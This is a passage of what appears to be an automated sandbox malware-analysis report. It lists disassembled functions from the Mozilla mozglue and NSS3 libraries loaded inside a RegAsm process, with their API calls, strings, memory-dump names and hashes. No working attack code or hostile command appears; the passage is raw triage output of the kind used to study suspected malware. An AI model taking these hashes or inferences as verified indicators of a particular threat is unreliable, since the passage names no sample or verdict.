LeaveCriticalSection.KERNEL32(6CC4F688), ref: 6CBE59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CC4F638,?,?,?,?), ref: 6CBE59E9

Strings

MOZ_APP_RESTART, xrefs: 6CBE56CC

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: d2b4e3df47560ee61caf6942f784283e424843f02fa26795f496d9faaf8f2049
Instruction ID: e173b37996db5b34963d5b274dc6c6da65d7a0d05f7cd2151884e165abf591ab
Opcode Fuzzy Hash: d2b4e3df47560ee61caf6942f784283e424843f02fa26795f496d9faaf8f2049
Instruction Fuzzy Hash: 4BC16B35A097909FD705DF28C4406AEB7F1FF9A758F05CA1DE8C897660D730A889CB86

Uniqueness

Uniqueness Score: -1.00%

Function 6CE14C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CE14CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CE14CFD
sqlite3_value_text16.NSS3(?), ref: 6CE14D44

Strings

bad parameter or other API misuse, xrefs: 6CE14D05
unknown error, xrefs: 6CE14D56
out of memory, xrefs: 6CE14C78, 6CE14C9E
abort due to ROLLBACK, xrefs: 6CE14D27, 6CE14D33
another row available, xrefs: 6CE14D20
API call with %s database connection pointer, xrefs: 6CE14CF6
no more rows available, xrefs: 6CE14D2E
invalid, xrefs: 6CE14CF1

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: cbf3175bd30bee7fcab2b007d6a366d0df12f430a244963ff2044f4ad361dee0
Instruction ID: 17a0370dbe5529e5d7cadb776a0d71ad4a75cfe2bc9d6cc3fac132cb2358ac54
Opcode Fuzzy Hash: cbf3175bd30bee7fcab2b007d6a366d0df12f430a244963ff2044f4ad361dee0
Instruction Fuzzy Hash: DD3128B3A1C911A7FB184A24A8127A573717B8331CF360127D4255BF64DB65AC72C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
Part of subcall function 6CC09420: __Init_thread_footer.LIBCMT ref: 6CC0949F

GetCurrentThreadId.KERNEL32 ref: 6CC0EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0EC8C

Part of subcall function 6CC094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC094EE
Part of subcall function 6CC094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC09508

GetCurrentThreadId.KERNEL32 ref: 6CC0ECA1
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CC0ECC5
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC0ED19
CloseHandle.KERNEL32(?), ref: 6CC0ED28
free.MOZGLUE(00000000), ref: 6CC0ED2F
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6CC0EC94

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6d20352005193638a1b7df2292be350086806f6fc7dfed3e61ef3ddbb62cfd05
Instruction ID: e43d3a586df9839d153068fe67c4308d37ee55ae08bec874d225c69594019bc7
Opcode Fuzzy Hash: 6d20352005193638a1b7df2292be350086806f6fc7dfed3e61ef3ddbb62cfd05
Instruction Fuzzy Hash: 6021D175700604AFDB00AF64D808BAA7B79EB8636CF14C214FD1897B41FB329805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD72CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CD72CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CD72D07

Part of subcall function 6CE509D0: PR_Now.NSS3 ref: 6CE50A22
Part of subcall function 6CE509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CE50A35
Part of subcall function 6CE509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CE50A66
Part of subcall function 6CE509D0: PR_GetCurrentThread.NSS3 ref: 6CE50A70
Part of subcall function 6CE509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CE50A9D
Part of subcall function 6CE509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CE50AC8
Part of subcall function 6CE509D0: PR_vsmprintf.NSS3(?,?), ref: 6CE50AE8
Part of subcall function 6CE509D0: EnterCriticalSection.KERNEL32(?), ref: 6CE50B19
Part of subcall function 6CE509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CE50B48
Part of subcall function 6CE509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CE50C76
Part of subcall function 6CE509D0: PR_LogFlush.NSS3 ref: 6CE50C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CD72D22

Part of subcall function 6CE509D0: OutputDebugStringA.KERNEL32(?), ref: 6CE50B88
Part of subcall function 6CE509D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE50C5D
Part of subcall function 6CE509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CE50C8D
Part of subcall function 6CE509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE50C9C
Part of subcall function 6CE509D0: OutputDebugStringA.KERNEL32(?), ref: 6CE50CD1
Part of subcall function 6CE509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CE50CEC
Part of subcall function 6CE509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE50CFB
Part of subcall function 6CE509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CE50D16
Part of subcall function 6CE509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CE50D26
Part of subcall function 6CE509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE50D35
Part of subcall function 6CE509D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CE50D65
Part of subcall function 6CE509D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CE50D70
Part of subcall function 6CE509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CE50D90
Part of subcall function 6CE509D0: free.MOZGLUE(00000000), ref: 6CE50D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CD72D3B

Part of subcall function 6CE509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CE50BAB
Part of subcall function 6CE509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE50BBA
Part of subcall function 6CE509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE50D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CD72D54

Part of subcall function 6CE509D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE50BCB
Part of subcall function 6CE509D0: EnterCriticalSection.KERNEL32(?), ref: 6CE50BDE
Part of subcall function 6CE509D0: OutputDebugStringA.KERNEL32(?), ref: 6CE50C16

Strings

C_InitToken, xrefs: 6CD72CE7
pLabel = 0x%p, xrefs: 6CD72D4F
ulPinLen = %d, xrefs: 6CD72D36
nl, xrefs: 6CD72D6C, 6CD72D9A
pPin = 0x%p, xrefs: 6CD72D1D
slotID = 0x%x, xrefs: 6CD72D02

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nl
API String ID: 420000887-3348607798
Opcode ID: 27f9e2911844b7b4c337b8320c27337f169a59c305d66c9a461d42bf7b448132
Instruction ID: f0de55637079aec2873105df7848a299afcc2fb3c4f260923e3771e2453708f7
Opcode Fuzzy Hash: 27f9e2911844b7b4c337b8320c27337f169a59c305d66c9a461d42bf7b448132
Instruction Fuzzy Hash: C721CB76700184EFDB109F95ED8CA4D3BB5EB9231DF544054F508A7631D7719858CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE12D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CE12D9F

Part of subcall function 6CCCCA30: EnterCriticalSection.KERNEL32(?,?,?,6CD2F9C9,?,6CD2F4DA,6CD2F9C9,?,?,6CCF369A), ref: 6CCCCA7A
Part of subcall function 6CCCCA30: LeaveCriticalSection.KERNEL32(?), ref: 6CCCCB26

sqlite3_exec.NSS3(?,?,6CE12F70,?,?), ref: 6CE12DF9
sqlite3_free.NSS3(00000000), ref: 6CE12E2C
sqlite3_free.NSS3(?), ref: 6CE12E3A
sqlite3_free.NSS3(?), ref: 6CE12E52
sqlite3_mprintf.NSS3(6CE7AAF9,?), ref: 6CE12E62
sqlite3_free.NSS3(?), ref: 6CE12E70
sqlite3_free.NSS3(?), ref: 6CE12E89
sqlite3_free.NSS3(?), ref: 6CE12EBB
sqlite3_free.NSS3(?), ref: 6CE12ECB
sqlite3_free.NSS3(00000000), ref: 6CE12F3E
sqlite3_free.NSS3(?), ref: 6CE12F4C

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 24b7711cfb420a500b43c8d0dc984ad8f6f98a491d9a801b673e7409445bfce0
Instruction ID: a965d03e5c2b72c8789627baef3b28da14fd20045dd3a22043421756ac63aae6
Opcode Fuzzy Hash: 24b7711cfb420a500b43c8d0dc984ad8f6f98a491d9a801b673e7409445bfce0
Instruction Fuzzy Hash: 2A616EB5E042058BEB01CF68DC85B9EB7B1BF6A34CF254028DC55A7B01E735E865CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD62C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CD63F23,?,6CD5E477,?,?,?,00000001,00000000,?,?,6CD63F23,?), ref: 6CD62C62
EnterCriticalSection.KERNEL32(0000001C,?,6CD5E477,?,?,?,00000001,00000000,?,?,6CD63F23,?), ref: 6CD62C76
PL_HashTableLookup.NSS3(00000000,?,?,6CD5E477,?,?,?,00000001,00000000,?,?,6CD63F23,?), ref: 6CD62C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CD5E477,?,?,?,00000001,00000000,?,?,6CD63F23,?), ref: 6CD62C93

Part of subcall function 6CDEDD70: TlsGetValue.KERNEL32 ref: 6CDEDD8C
Part of subcall function 6CDEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDEDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CD5E477,?,?,?,00000001,00000000,?,?,6CD63F23,?), ref: 6CD62CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CD5E477,?,?,?,00000001,00000000,?,?,6CD63F23,?), ref: 6CD62CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CD5E477,?,?,?,00000001,00000000,?,?,6CD63F23), ref: 6CD62CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CD5E477,?,?,?,00000001,00000000,?), ref: 6CD62CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CD5E477,?,?,?,00000001,00000000,?), ref: 6CD62D4D
EnterCriticalSection.KERNEL32(?), ref: 6CD62D61
PL_HashTableLookup.NSS3(?,?), ref: 6CD62D71
PR_Unlock.NSS3(?), ref: 6CD62D7E

Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307AD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307CD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307D6
Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CCC204A), ref: 6CD307E4
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,6CCC204A), ref: 6CD30864
Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CD30880
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,6CCC204A), ref: 6CD308CB
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308D7
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308FB

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 301748e319f697effe1ffd0977caf952758da7ca274948393832fab3175b51c5
Instruction ID: ac8a1c2a5a28fcd52c8c3ac4768c613dab79d43a58ba6237fdfed18a501f0630
Opcode Fuzzy Hash: 301748e319f697effe1ffd0977caf952758da7ca274948393832fab3175b51c5
Instruction Fuzzy Hash: 3651D5B6D00605ABDB00AF25DC458AA7774FF1A35CF448521EC1897B22E731ED68CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CCC4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4CB0
PR_Unlock.NSS3(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4D97
PR_Lock.NSS3(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4DBA
PR_WaitCondVar.NSS3 ref: 6CCC4DD4
PR_Unlock.NSS3(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4DEF

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 414eb0003f03f937bd032f98b67d4f9cda4ece9cdcef77f88f9409b45eb2a1b4
Instruction ID: 35cdc934444ee21c61a6c8a47c3259974f67e1a5b1bdd092ca5991b36ac33109
Opcode Fuzzy Hash: 414eb0003f03f937bd032f98b67d4f9cda4ece9cdcef77f88f9409b45eb2a1b4
Instruction Fuzzy Hash: 58413CB5B04A25CFCB00FFB9D488569BBB4BF46354B058669D848DB721EB30D885CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CC08ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6CBCEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBCEB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CC0B392,?,?,00000001), ref: 6CC091F4

Part of subcall function 6CBFCBE8: GetCurrentProcess.KERNEL32(?,6CBC31A7), ref: 6CBFCBF1
Part of subcall function 6CBFCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CBC31A7), ref: 6CBFCBFA

Strings

stack-chart, xrefs: 6CC090B2
name, xrefs: 6CC08F16
timeline-memory, xrefs: 6CC09088
timeline-overview, xrefs: 6CC0907A
marker-table, xrefs: 6CC0906C
timeline-fileio, xrefs: 6CC090A4
marker-chart, xrefs: 6CC0905E
timeline-ipc, xrefs: 6CC09096
data, xrefs: 6CC090E8

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: a8fc31aa0fb46259bbc05e9cf5efb37f2d5c138a69b5886a48df686f75f9b136
Instruction ID: 144b0a076155ac60f4767494f4a91e1c61ddad3b48cdafa09a6e0bcd74ce6bbe
Opcode Fuzzy Hash: a8fc31aa0fb46259bbc05e9cf5efb37f2d5c138a69b5886a48df686f75f9b136
Instruction Fuzzy Hash: C9B1D4B0B01259DBDB04CF99D492BEEBBB5BF85348F108419D506ABF80E732A945CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBEC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBEC5A3
WideCharToMultiByte.KERNEL32 ref: 6CBEC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CBEC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CBECA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBECA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBECAA5

Strings

0, xrefs: 6CBED30A
(null), xrefs: 6CBEC596

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 032403c914811e26eca45c8c589841c41f52f02bb5b66e7bbf4a6164f64bb4f5
Instruction ID: ecfda60d8cde4b8cac35e9fe1948517ff48304412b31f7855114dab1b7025d3b
Opcode Fuzzy Hash: 032403c914811e26eca45c8c589841c41f52f02bb5b66e7bbf4a6164f64bb4f5
Instruction Fuzzy Hash: 6EA169306083829FDB11EF28C55475BBBF1EFC9B88F04892DE89997641D775E805CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CBEC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBEC784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBEC801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6CBEC83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CBEC891

Strings

inf, xrefs: 6CBEC78F
NAN, xrefs: 6CBEC7AD
INF, xrefs: 6CBEC794
nan, xrefs: 6CBEC7A8

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: d3582f23074020eefd5fae1d90115c6d52de2b07a04fed5a4969c88ffba698cb
Instruction ID: c160022483c6408f9ae357d44658c1f418b4bbaf57f66e1865619eee45e51fe7
Opcode Fuzzy Hash: d3582f23074020eefd5fae1d90115c6d52de2b07a04fed5a4969c88ffba698cb
Instruction Fuzzy Hash: 0A51A330A087808BD700EF6CC58169AFBF0BF9E749F008A2CE9D5A7651E770D9858B43

Uniqueness

Uniqueness Score: -1.00%

Function 6CD76C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CD76C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD76C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD76CA3

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD76CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CD76CD5

Strings

